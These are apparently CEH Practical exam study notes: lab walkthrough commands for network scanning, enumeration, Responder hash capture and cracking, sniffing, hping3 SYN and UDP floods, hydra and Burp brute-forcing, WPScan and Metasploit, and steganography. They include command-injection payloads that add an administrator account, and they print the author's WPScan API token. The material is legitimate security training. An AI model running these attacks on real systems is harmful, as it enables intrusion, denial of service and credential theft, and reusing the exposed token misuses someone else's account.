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CEH Practical Exam Notes (ilab), Blog and video


Module 03: Scanning Networks

Lab1-Task1: Host discovery

  • nmap -sn -PR [IP]
    • -sn: Disable port scan
    • -PR: ARP ping scan
  • nmap -sn -PU [IP]
    • -PU: UDP ping scan
  • nmap -sn -PE [IP or IP Range]
    • -PE: ICMP ECHO ping scan
  • nmap -sn -PP [IP]
    • -PP: ICMP timestamp ping scan
  • nmap -sn -PM [IP]
    • -PM: ICMP address mask ping scan
  • nmap -sn -PS [IP]
    • -PS: TCP SYN Ping scan
  • nmap -sn -PA [IP]
    • -PA: TCP ACK Ping scan
  • nmap -sn -PO [IP]
    • -PO: IP Protocol Ping scan

Lab2-Task3: Port and Service Discovery

  • nmap -sT -v [IP]
    • -sT: TCP connect/full open scan
    • -v: Verbose output
  • nmap -sS -v [IP]
    • -sS: Stealth scan/TCP hall-open scan
  • nmap -sX -v [IP]
    • -sX: Xmax scan
  • nmap -sM -v [IP]
    • -sM: TCP Maimon scan
  • nmap -sA -v [IP]
    • -sA: ACK flag probe scan
  • nmap -sU -v [IP]
    • -sU: UDP scan
  • nmap -sI -v [IP]
    • -sI: IDLE/IPID Header scan
  • nmap -sY -v [IP]
    • -sY: SCTP INIT Scan
  • nmap -sZ -v [IP]
    • -sZ: SCTP COOKIE ECHO Scan
  • nmap -sV -v [IP]
    • -sV: Detect service versions
  • nmap -A -v [IP]
    • -A: Aggressive scan

Lab3-Task2: OS Discovery

  • nmap -A -v [IP]
    • -A: Aggressive scan
  • nmap -O -v [IP]
    • -O: OS discovery
  • nmap –script smb-os-discovery.nse [IP]
    • -–script: Specify the customized script
    • smb-os-discovery.nse: Determine the OS, computer name, domain, workgroup, and current time over the SMB protocol (Port 445 or 139)

Module 04: Enumeration

Lab2-Task1: Enumerate SNMP using snmp-check

  • nmap -sU -p 161 [IP]
  • snmp-check [IP]


  • nbtstat -a [IP] (Windows)
  • nbtstat -c

Module 06: System Hacking

Lab1-Task1: Perform Active Online Attack to Crack the System's Password using Responder

  • Linux:
    • cd
    • cd Responder
    • chmox +x ./Responder.py
    • sudo ./Responder.py -I eth0
    • passwd: ****
  • Windows
    • run
    • \CEH-Tools
  • Linux:
    • Home/Responder/logs/SMB-NTMLv2-SSP-[IP].txt
    • sudo snap install john-the-ripper
    • passwd: ****
    • sudo john /home/ubuntu/Responder/logs/SMB-NTLMv2-SSP-

Lab3-Task6: Covert Channels using Covert_TCP

  • Attacker:
    • cd Desktop
    • mkdir Send
    • cd Send
    • echo "Secret"->message.txt
    • Place->Network
    • Ctrl+L
    • smb://[IP]
    • Account & Password
    • copy and paste covert_tcp.c
    • cc -o covert_tcp covert_tcp.c
  • Target:
    • tcpdump -nvvx port 8888 -I lo
    • cd Desktop
    • mkdir Receive
    • cd Receive
    • File->Ctrl+L
    • smb://[IP]
    • copy and paste covert_tcp.c
    • cc -o covert_tcp covert_tcp.c
    • ./covert_tcp -dest -source -source_port 9999 -dest_port 8888 -server -file /home/ubuntu/Desktop/Receive/receive.txt
    • Tcpdump captures no packets
  • Attacker
    • ./covert_tcp -dest -source -source_port 8888 -dest_port 9999 -file /home/attacker/Desktop/send/message.txt
    • Wireshark (message string being send in individual packet)

Module 08: Sniffing

Lab2-Task1: Password Sniffing using Wireshark

  • Attacker
    • Wireshark
  • Target
  • Attacker
    • Stop capture
    • File->Save as
    • Filter: http.request.method==POST
    • RDP log in Target
    • service
    • start Remote Packet Capture Protocol v.0 (experimental)
    • Log off Target
    • Wireshark->Capture options->Manage Interface->Remote Interfaces
    • Add a remote host and its interface
    • Fill info
  • Target
    • Log in
    • Browse website and log in
  • Attacker
    • Get packets

Module 10: Denial-of-Service

Lab1-Task2: Perform a DoS Attack on a Target Host using hping3

  • Target:
    • Wireshark->Ethernet
  • Attacker
    • hping3 -S [Target IP] -a [Spoofable IP] -p 22 -flood
      • -S: Set the SYN flag
      • -a: Spoof the IP address
      • -p: Specify the destination port
      • --flood: Send a huge number of packets
  • Target
    • Check wireshark
  • Attacker (Perform PoD)
    • hping3 -d 65538 -S -p 21 –flood [Target IP]
      • -d: Specify data size
      • -S: Set the SYN flag
  • Attacker (Perform UDP application layer flood attack)
    • nmap -p 139 (check service)
    • hping3 -2 -p 139 –flood [IP]
      • -2: Specify UDP mode
  • Other UDP-based applications and their ports
    • CharGen UDP Port 19
    • SNMPv2 UDP Port 161
    • QOTD UDP Port 17
    • RPC UDP Port 135
    • SSDP UDP Port 1900
    • CLDAP UDP Port 389
    • TFTP UDP Port 69
    • NetBIOS UDP Port 137,138,139
    • NTP UDP Port 123
    • Quake Network Protocol UDP Port 26000
    • VoIP UDP Port 5060

Module 13: Hacking Web Servers

Lab2-Task1: Crack FTP Credentials using a Dictionary Attack

  • nmap -p 21 [IP]
  • hydra -L usernames.txt -P passwords.txt

Module 14: Hacking Web Applications

Lab2-Task1: Perform a Brute-force Attack using Burp Suite

  • Set proxy for browser:
  • Burpsuite
  • Type random credentials
  • capture the request, right click->send to Intrucder
  • Intruder->Positions
  • Clear $
  • Attack type: Cluster bomb
  • select account and password value, Add $
  • Payloads: Load wordlist file for set 1 and set 2
  • start attack
  • filter status==302
  • open the raw, get the credentials
  • recover proxy settings

Lab2-Task3: Exploit Parameter Tampering and XSS Vulnerabilities in Web Applications

  • Log in a website, change the parameter value (id )in the URL
  • Conduct a XSS attack: Submit script codes via text area

Lab2-Task5: Enumerate and Hack a Web Application using WPScan and Metasploit

  • wpscan --api-token hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads --url --plugins-detection aggressive --enumerate u
    • --enumerate u: Specify the enumeration of users
    • API Token: Register at https://wpscan.com/register
    • Mine: hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads
  • service postgresql start
  • msfconsole
  • use auxiliary/scanner/http/wordpress_login_enum
  • show options
  • set PASS_FILE password.txt
  • set RHOST
  • set RPORT 8080
  • set USERNAME admin
  • run
  • Find the credential

Lab2-Task6: Exploit a Remote Command Execution Vulnerability to Compromise a Target Web Server (DVWA low level security)

  • If found command injection vulnerability in an input textfield
  • | hostname
  • | whoami
  • | tasklist| Taskkill /PID /F
    • /PID: Process ID value od the process
    • /F: Forcefully terminate the process
  • | dir C:\
  • | net user
  • | net user user001 /Add
  • | net user user001
  • | net localgroup Administrators user001 /Add
  • Use created account user001 to log in remotely

Module 15: SQL Injection

Lab1-Task2: Perform an SQL Injection Attack Against MSSQL to Extract Databases using sqlmap

Module 17: Hacking Mobile Platforms

Lab 1-Task 4: Exploit the Android Platform through ADB using PhoneSploit

  • cd Phonesploit
  • python3 -m pip install colorama
  • python3 phonesploit.py
  • 3
  • 4
  • pwd
  • cd sdcard
  • cd Download

Module 20: Cryptography

Lab1-Task2: Calculate MD5 Hashes using MD5 Calculator

  • Nothing special

Lab4-Task1: Perform Disk Encryption using VeraCrypt

  • Click VeraCrypt
  • Create Volumn
  • Create an encrypted file container
  • Specify a path and file name
  • Set password
  • Select NAT
  • Move the mouse randomly for some seconds, and click Format
  • Exit
  • Select a drive, select file, open, mount
  • Input password
  • Dismount
  • Exit

Module Appendix: Covered Tools

  • Nmap
    • Multiple Labs
  • Hydra
    • Module 13: Lab2-Task1
  • Sqlmap
    • Module 15: Lab1-Task2
  • WPScan
    • Module 14: Lab2-Task5
    • wpscan –-url -t 50 -U admin -P rockyou.txt
  • Nikto
  • John
    • Module 06: Lab1-Task1
  • Hashcat
  • Metasploit
    • Module 14: Lab2-Task5
  • Responder LLMNR
    • Module 06: Lab1-Task1
  • Wireshark or Tcpdump
    • Multiple Labs
  • Steghide
    • Hide
    • steghide embed -cf [img file] -ef [file to be hide]
    • steghide embed -cf 1.jpg -ef 1.txt
    • Enter password or skip
    • Extract
    • steghide info 1.jpg
    • steghide extract -sf 1.jpg
    • Enter password if it does exist
  • OpenStego
  • QuickStego
    • Module 06: Lab0-Task1
  • Dirb (Web content scanner)
  • Searchsploit (Exploit-DB)
  • Crunch (wordlist generator)
  • Cewl (URL spider)
  • Veracrypt
    • Module 20: Lab4-Task1
  • Hashcalc
    • Module 20: Lab1-Task1 (Nothing special)
  • Rainbow Crack
    • Module 06: Lab0-Task0
  • Windows SMB
    • smbclient -L [IP]
    • smbclient \ip\sharename
    • nmap -p 445 -sV –script smb-enum-services [IP]
  • **Run Nmap at the beginning **
    • nmap -sn -PR -oN ip.txt
    • nmap -A -T4 -vv -iL ip.txt -oN nmap.txt
    • nmap -sU -sV -A -T4 -v -oN udp.txt
  • Snow
  • ./snow -C -p "magic" output.txt
  • snow -C -m "Secret Text Goes Here!" -p "magic" readme.txt readme2.txt • -m → Set your message • -p → Set your password
  • Rainbowcrack
    • Use Winrtgen to generate a rainbow table
    • Launch RainbowCrack
    • File->Load NTLM Hashes from PWDUMP File
    • Rainbow Table->Search Rainbow Table
    • Use the generated rainbow table
    • RainbowCrack automatically starts to crack the hashes QuickStego
    • Launch QuickStego
    • Open Image, and select target .jpg file
    • Open Text, and select a txt file
    • Hide text, save image file
    • Re-launch, Open Image
    • Select stego file
    • Hidden text shows up

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